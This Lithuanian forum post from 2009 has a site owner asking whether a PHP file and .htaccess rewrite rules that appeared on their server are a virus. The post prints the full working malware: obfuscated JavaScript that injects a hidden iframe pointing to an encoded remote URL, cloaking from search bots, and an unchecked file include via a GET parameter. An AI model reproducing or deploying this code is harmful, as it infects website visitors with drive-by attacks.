Parašė edeni· 2009 Lap. 8 17:11:50
#33
Naujas klausimas.
Mano ftp direktorijoje atsirado toks failas: PE609F31D777BD.php
Kas jame yra :
<?php
$frame_code = '<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->';
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
@chdir($dir);
$dir = getcwd();
@chdir($curDir);
return $dir;
}
function is_search_bot($agent)
{
if(
strstr($agent, "Yandex/") != null ||
strstr($agent, "YaDirectBot") != null ||
strstr($agent, "James Bond") != null ||
strstr($agent, "Googlebot") != null ||
strstr($agent, "Mediapartners-Google") != null ||
strstr($agent, "StackRambler") != null ||
strstr($agent, "Slurp") != null ||
strstr($agent, "msnbot") != null
)
{
return true;
}
return false;
}
function callback($data)
{
global $frame_code;
$data = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $data);
$data = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $data);
$data = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $data);
if(is_search_bot($_SERVER['HTTP_USER_AGENT']) == true) {
return $data;
} else {
if(preg_match("/(<body[^>]*>)/i", $data) > 0) {
return preg_replace("/(<body[^>]*>)/i", "$1 \n".$frame_code, $data, 1);
}
else {
return $data.$frame_code;
}
}
}
if(@ob_start('callback') == true) {
$file = $_GET['qq'];
@chdir(get_file_dir_($file));
include($file);
} else {
echo $frame_code;
}
?>
ir į .htaccess kažkaip įsirašė:
#609F31D777BD{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) PE609F31D777BD.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#609F31D777BD}
Tai man iškilo klausymas čia virusas ar ne ? ar čia antivirusinė nuo tų iframe kodų ?
Redagavo edeni· 2009 Lap. 8 17:11:17